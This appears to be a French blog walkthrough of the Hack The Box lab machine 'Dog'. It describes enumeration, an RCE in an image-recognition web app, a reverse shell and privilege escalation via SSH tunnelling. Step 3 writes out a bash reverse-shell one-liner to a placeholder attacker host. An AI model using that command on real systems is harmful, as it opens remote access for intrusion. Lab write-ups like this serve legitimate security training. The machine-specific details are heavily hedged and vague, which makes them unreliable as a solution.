Hack The Box – Machine Dog : Walkthrough et Solution
La machine “Dog” sur Hack The Box est une machine Linux de niveau facile qui se concentre sur l’énumération de services web, l’exploitation de vulnérabilités connues, et le contournement de restrictions via des techniques de tunneling. Ce walkthrough détaillé vous guidera à travers les étapes clés pour obtenir un shell et élever vos privilèges.
Étape 1: Énumération Initiale
Commencez par un scan Nmap pour identifier les ports ouverts et les services en cours d’exécution. Un scan de base peut révéler des ports standards comme le 22 (SSH) et le 80 (HTTP), ainsi que des ports moins communs. Le port 80 (HTTP) est souvent le point de départ. Explorez la page web. Une énumération plus approfondie à l’aide d’outils comme dirb
, gobuster
, ou ffuf
peut révéler des répertoires ou des fichiers cachés.
Étape 2: Exploration du Web
L’exploration du site web peut révéler des informations sensibles. Recherchez des commentaires dans le code source HTML, des fichiers de configuration potentiels, ou des formulaires d’upload vulnérables. Sur “Dog”, vous découvrirez probablement une application web hébergeant un service de reconnaissance d’images. Cette application peut être vulnérable à des attaques de type Remote Code Execution (RCE) si elle n’est pas correctement sécurisée.
Étape 3: Exploitation et Obtention d’un Shell
La vulnérabilité RCE peut être exploitée en envoyant une image spécialement conçue ou en manipulant les requêtes HTTP. Utilisez des outils comme Burp Suite
pour intercepter et modifier les requêtes envoyées au serveur. L’objectif est d’exécuter des commandes système sur le serveur. Une fois l’exécution de code réussie, vous pouvez obtenir un shell inversé (reverse shell) en utilisant netcat
, bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1
, ou une autre méthode de shell inversé.
Étape 4: Énumération Post-Exploitation
Après avoir obtenu un shell initial, l’énumération post-exploitation est cruciale. Explorez les fichiers du système, les processus en cours d’exécution, et les connexions réseau. Recherchez des informations d’identification (mots de passe, clés SSH), des scripts intéressants, ou des services qui s’exécutent localement.
Étape 5: Élévation de Privilèges
Sur “Dog”, l’élévation de privilèges peut impliquer l’exploitation d’un service qui s’exécute en tant qu’utilisateur privilégié (par exemple, root). Une technique courante est d’utiliser un tunnel SSH (port forwarding) pour accéder à un service local qui est vulnérable. Vous devrez peut-être transférer un outil comme socat
vers la machine cible pour créer ce tunnel. Une fois le tunnel établi, exploitez la vulnérabilité du service local pour obtenir un shell root. Ceci peut impliquer un buffer overflow, une erreur de configuration, ou une autre vulnérabilité connue.
Conclusion
La machine “Dog” est une bonne introduction aux techniques d’énumération web, à l’exploitation de RCE, et à l’élévation de privilèges via le tunneling de ports. En comprenant ces concepts, vous serez mieux préparé pour aborder des machines plus complexes sur Hack The Box et dans le domaine de la sécurité informatique.
Leave a Reply